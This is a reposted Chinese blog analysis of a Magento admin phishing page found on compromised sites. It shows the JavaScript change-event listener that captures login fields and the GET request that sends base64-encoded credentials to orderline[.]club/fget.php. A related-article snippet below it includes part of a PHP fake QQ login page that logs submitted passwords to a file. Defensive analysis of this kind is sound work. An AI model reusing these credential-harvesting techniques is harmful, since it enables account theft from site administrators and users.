php管理员登录页面代码_Magento钓鱼页面利用JavaScript进行渗透

最新推荐文章于 2022-05-22 00:42:47 发布
最新推荐文章于 2022-05-22 00:42:47 发布
阅读量187 收藏
点赞数
文章标签: php管理员登录页面代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29801195/article/details/113311140
版权
80957ed1edfee4dd7330c37f2c692b4c.png 点击上方 蓝字 关注我们

概述

近期,研究人员在被入侵的网站上找到了名为“wp-order.php”的Magento管理员登录网络钓鱼页面。尽管该文件名有些奇特,但它仍成功加载了看起来合法的Magento 1.x 登录页面。 6bab9189670a0aaaeb37d06092f7ec17.png 受害者无法轻易察觉到的是,该网站上的图形和CSS等页面元素几乎都是从orderline[.]club恶意域名加载的。 4a053fdbc2409d6497f6a06a5763a8d8.png

收集Magento登陆凭证

该钓鱼页面使用JavaScript EventListener(addEventListener),以及用户名和登录名(密码)字段的change事件进行攻击,不需要使用单独的PHP文件或PHP函数,就可以向攻击者发送邮件,这也是研究人员经常在此类网络钓鱼页面中发现渗透利用的原因。 
...function rever() { try { document.getElementById('login').addEventListener('change', magetrack); } catch (err) { } try { document.getElementById('username').addEventListener('change', magetrack); } catch (err) { }...
一旦受害者输入用户和密码并点击登录框外的其它地方后,该网络钓鱼页面会自动将包含被盗登录数据的GET请求,发送到orderline[.]club/fget.php。 
GET /fget.php?eyJ1cmwiOiJodHRwOi8vbG9jYWxob3N0L3dwLW9yZGVyLnBocCIsImxvZ2luIjoiYWRtaW4iLCJwYXNzIjoiYWRtaW4ifQ==
以下gif动图演示了,当用户在输入登录数据时,页面是如何发送GET请求的,无论用户是否点击登录按钮。 8a08d75bbbeb50f3703762f13ecbd364.gif 可以看出,被盗的登录数据使用base64进行编码,并作为查询发送给攻击者。如果从发出的GET请求中解码base64,将得到: 
{"url":"http://localhost/wp-order.php","login":"admin","pass":"admin"}

总结

该代码表明攻击者仍在开发此网络钓鱼页面,因此这种渗透方式在将来的网络钓鱼页面中将变得越来越流行。 6fc4d61ec04dc8e2549a0ebe83f15806.png

END

063fe14ddb9f6db989b0bc84a181b808.png

好文!必须在看
阿弥陀佛 我是小胖
关注
php管理员登录页面代码_纯代码检测文章是否被百度收录并前台仅管理员可见
weixin_36269385的博客
01-24 191
百度搜索在国内的影响力还是非常之大的,目前本站流量有80%以上来自于百度搜索,所以做好百度搜索的工作是非常必要的。前期已经在站点中加上了自动推送百度搜索的代码(Wordpress百度搜索自动推送代码的优化改进 https://www.iappi.cn/2019_05/2019633.html),但仅仅推送了并非就可以高枕无忧了,因为是否收录并索引了才是关键。而在百度搜索资源平台(https://z...
php中的登陆login实例代码
12-18
本文实例为大家分享了php中的登陆login具体实现代码,供大家参考,具体内容如下 <?php require "../include/DBClass.php"; $username=$_POST['UserName']; $password=$_POST['Password']; if(empty($username) || empty($password)){ Go_Msg("请填写用户名,密码!","../default.html"); exit; } DBConn(); $password=md5($password); $SQL = "Select UserName,User
php登录界面的代码,php登录页面()代码
weixin_29471009的博客
04-03 454
摘要 腾兴网为您分享:php登录页面()代码,掌上新华,悬浮球,小t智联,无忧英语等软件知识,以及58app,hdp直播tv版,华为培训app,时尚魔女,吾爱app,学习打卡软件,grub4dos,好孕妈妈帮,劳动力,diskgenius专业,看小说听书,英雄联盟六周年,全功能万年历,最高法,北京鲁迅博物馆等软件it资讯,欢迎关注腾兴网。php登录页面代码: ?php//开启session登录验...
php后台登陆页面代码
weixin_34090562的博客
07-11 552
login.php<?phpsession_start();?><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>公司事务 - 登录</title><link href="skin/css/logi...
php添加管理员页面完整代码,php – Opencart管理员端的空白页面
weixin_35436076的博客
03-18 336
我在locahost设置了opencart商店然后我将所有内容上传到在线托管并更改了root opencart文件夹和Admin文件夹中config.php文件中的路径.前面工作正常,但管理员方面没有工作.它只显示一个空白页面.我调试My Index.php文件是通过回波数在某些地方放置回声来检查它是否正在执行到那一点.我试图解决这个错误.我更新了这里给出的文件代码.一个变化是My Log最近产生...
wp_custom_menu-1.2.5.rar_magento_magento custom menu
09-14
安装"wp_custom_menu-1.2.5"压缩包时,通常需要解压后将文件上传到Magento的指定目录,然后通过Magento后台的扩展管理进行安装和激活。在使用过程中,商家应遵循Magento的最佳实践,确保所有更改都在安全的环境中...
magento快速复制网站_magento_magento快速复制站_
10-02
Magento是一款强大的开源电子商务平台,基于PHP开发,以其高度可定制性、灵活性和丰富的功能而闻名。在电商领域,经常会有需求将一个已经建立并运行良好的Magento站点快速复制到另一个服务器,用于测试、备份或者...
SpecialPromotionsProforMagento2-2.7.0-CE_magento_magento2_builte
10-01
这允许开发者方便地管理和更新模块,保持与Magento 2核心代码的同步。 5. **Promotions Manager**: "promotions_manager_for_magento_2_user_guide.pdf"是用户指南,详细介绍了如何使用此模块创建和管理促销活动,...
AdvancedPermissionsforMagento2-1.3.6-CE_magento_magento2_
09-29
- **Magento 2权限管理**:Magento 2内置的权限系统允许管理员分配不同的角色并设定相应的权限,如访问特定菜单、管理产品、查看报告等。然而,Amasty的高级权限插件提供了更深度的控制,比如可以限制到模块、控制器...
iwd_m2_checkout_suite_pro_1.6.0_magento_magento2_payment_checkou
10-03
本文将深入探讨该插件的功能、优势以及如何在Magento 2平台上集成和利用。 首先,IWD Checkout Suite Pro是一款针对Magento 2平台设计的专业级结账解决方案。它旨在通过简化和加速结账流程,降低购物车放弃率,从而...
PHP用户管理完整源代码
07-28
PHP用户管理完整源代码,包括用户注册、登录、用户列表显示、数据分页、用户注销等功能的完整PHP代码实现。同时包括MySQL数据库文件在\common\userLogin.sql,数据库可以直接导入到MySQL数据库中使用。
管理员网页详细代码(只有HTML)
04-22
管理员网页详细代码(只有HTML)含有管理员页面基本所有网页的代码,有几十页的内容,小白看看就可以了,并不是很专业的东西
管理员登入界面
11-24
管理员登入界面工 jsp网页设计 源代码 管理员登录语句 图书馆管理系统 function check(form){ if (form.name.value==""){ alert("请输入管理员名称!");form.name.focus();return false; } if (form.pwd.value==""){ alert("请输入密码!");form.pwd.focus();return false; } -----------
PHP实现简单的仿QQ空间登录界面钓鱼(仅供参考测试不可用于非法用途)
01-08
声明:此代码仅供参考不可用于非法用途,非法使用造成的后果自负 演示:界面 点击提交后账号和密码会被写入txt文本中,同时页面跳转 <?php if (isset($_POST[user])) { if (isset($_POST[pass])) { $myfile = fopen(abc.txt, a)/*abc.txt用于接收提交数据*/ or die(Unable to open file!); $txt = ━━━━账号=.$_POST[user]. 密码=.$_POST[pass];//$_POST[user]这个变量的意思,在所有post
PHP后台管理登录界面代码
热门推荐
交流 QQ 1157222342
07-31 1万+
1,自学PHP,编写一个简单的后台登录管理系统; 2,代码中少部分借用网上开源代码,如有不规范的地方请指正,如有更好的方法,多谢分享; 3,享受编程的乐趣并得到知识的提高,是我最大的开心所在; 4,工具,服务器:phpstudy,编辑工具:HBuilder; login.html代码  &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; ...
php用户管理员登录代码,标识用户登录状态
weixin_29936201的博客
03-21 626
数据库think_user表新加一个status字段,用户登录后更改数据库字段来表示登录与在线状态用户登陆成功后添加如下代码:存入session,修改members()方法,代码如下:...
管理员登录后台php代码,PHP开发简单图书后台管理系统管理员登录功能
weixin_42348783的博客
03-10 750
前面创建了数据库表admin,这里需要加入一条用户名和密码的测试数据
PHP制作简单的登录页面
Meereen的博客
05-22 1万+
PHP制作简单的登录页面
管理员登陆页面php,Dedecms管理员登录输入账号密码点击登陆又回到登陆界面
weixin_35271253的博客
03-25 3480
织梦dedecms这款开源内容管理系统在php虚拟主机上搭建网站的确非常方便,效率当然也是很高的。可是这款程序毕竟是开源的,缺少定期的升级打补丁,之前版本的最大的问题就是很容易被挂马,挂黑链等等。现在升级到最新的5.7版本了这方面的安全性的确得到了很大的提升了。可是别的方面当客户使用过程中稍有改动就会导致前台格式乱。后台登陆不了,小编今天遇到一个客户就是使用这款开源程序搭建的一个企业站点可是再登陆...
设计一个电商系统的管理员页面前端代码
最新发布
04-26
但是我可以提供一些建议和参考资料,帮助您更好地完成电商系统的管理员页面前端代码的设计。 首先,您需要深入了解管理员页面需要实现的功能和需求,例如:商品管理、订单管理、用户管理、数据统计、日志管理等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值